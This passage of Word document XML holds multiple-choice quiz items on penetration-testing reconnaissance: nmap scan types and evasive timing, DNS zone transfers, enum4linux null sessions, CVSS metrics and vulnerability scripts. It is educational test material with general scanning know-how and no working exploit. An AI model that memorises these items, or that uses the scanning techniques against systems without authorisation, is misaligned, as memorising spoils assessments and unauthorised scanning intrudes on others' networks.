          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -sT (Connect scan)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -sN (Null scan)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -sU (UDP scan)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> A DNS zone transfer (AXFR) succeeding against an attacker's request is dangerous mainly because:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It slows down the DNS server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It reveals the entire internal and external hostname map in one request</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It changes DNS records permanently</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It is illegal to attempt even with permission</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> In CVSS v3.1, which metric captures whether a victim must click a link for an attack to succeed?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Attack Complexity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Privileges Required</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> User Interaction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Scope</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> enum4linux -a run against a poorly configured SMB server most directly risks leaking:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The server's CPU temperature</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A list of valid usernames via a null session</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> The physical location of the server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> TLS certificate private keys</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q6.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which timing template is the slowest and most evasive?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q7.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> What makes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">--script=vuln</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> more intrusive than </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">--script=default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It only grabs banners</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It actively tests services against known vulnerability signatures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It performs OS fingerprinting only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> It disables logging on the target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q8.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> A finding shows CVSS 9.8 but the vulnerable service is only reachable from an isolated internal network with no other foothold. The correct response is to:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mark it Critical and fix it before anything else, no further thought needed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ignore it since internal findings never matter</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note reduced practical exploitability/exposure in prioritisation while still tracking it</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">D.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Delete the finding since CVSS doesn't apply internally</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Q9.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Which source is authoritative for CVE descriptions and CVSS vectors?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> A random security blog</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="30"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">B.</w:t>
      </w:r>
      <w:r>
